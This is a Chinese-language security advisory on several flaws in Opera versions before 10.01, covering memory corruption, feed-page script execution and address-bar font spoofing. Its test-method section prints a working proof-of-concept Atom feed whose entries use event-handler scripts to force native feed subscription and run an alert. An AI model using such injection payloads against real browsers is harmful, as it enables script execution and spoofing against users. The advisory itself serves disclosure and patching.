安全研究
安全漏洞
Opera Web浏览器10.01版本修复多个安全漏洞
发布日期:2009-10-28
更新日期:2009-10-29
受影响系统:
Opera Software Opera Web Browser < 10.01不受影响系统:
Opera Software Opera Web Browser 10.01描述:
BUGTRAQ ID: 36850
CVE(CAN) ID: CVE-2009-3831,CVE-2009-3832
Opera是一款流行的WEB浏览器,支持多种平台。
Opera的10.01之前版本中存在多个安全漏洞,可能允许恶意用户读取敏感信息、执行任意指令或执行欺骗攻击。
1) 处理域名时的内存破坏可能导致执行任意代码。
2) Opera可能允许在源订阅页面上运行脚本以获得对源对象的访问,这可能导致自动订阅源或读取其他源。
3) 在Windows上处理Web字体时的错误可能导致更改地址字段的字体,在地址中显示任意域名。
<*来源:Chris Weber
John Daggett
链接:http://secunia.com/advisories/37182/
http://www.opera.com/support/kb/view/938/
http://www.opera.com/support/kb/view/939/
http://www.opera.com/support/kb/view/940/
http://securethoughts.com/2009/10/hijacking-operas-native-page-using-malicious-rss-payloads/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<feed
xmlns="http://www.w3.org/2005/Atom"
xml:base="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom">
<id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom</id>
<title>Feed Injection in Opera 10 Feed Aggregator</title>
<updated>2009-09-09T00:00:00Z</updated>
<link href="/wp" />
<link rel="self" href="" />
<author><name>Inferno</name></author>
<contributor>
<name>Inferno</name>
<div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
This exploit will inject this feed in Opera's inbuilt feed aggregator
</div>
</contributor>
<entry>
<title>Feed Injector 1</title>
<id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#1</id>
<link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#1"/>
<content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><img src="http://google.com" onerror="opera.feeds.subscribeNative(location.href)"></img>
</div></content>
<updated>2009-09-09T00:00:00Z</updated>
</entry>
<entry>
<title>Feed Injector 2</title>
<id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#2</id>
<link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#2"/>
<content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><p onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</p>
</div></content>
<updated>2009-09-09T00:00:00Z</updated>
</entry>
<entry>
<title>Feed Injector 3</title>
<id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#3</id>
<link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#3"/>
<content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><a href="http://google.com" onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</a>
</div></content>
<updated>2009-09-09T00:00:00Z</updated>
</entry>
<entry>
<title>Basic Script</title>
<id>http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#4</id>
<link href="http://www.securethoughts.com/security/rssatomxss/opera10exploit2.atom#4"/>
<content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #1')</script></div></content>
<updated>2009-09-09T00:00:00Z</updated>
</entry>
</feed>
建议:
厂商补丁:
Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.opera.com
浏览次数:2640
严重程度:0(网友投票)
绿盟科技给您安全的保障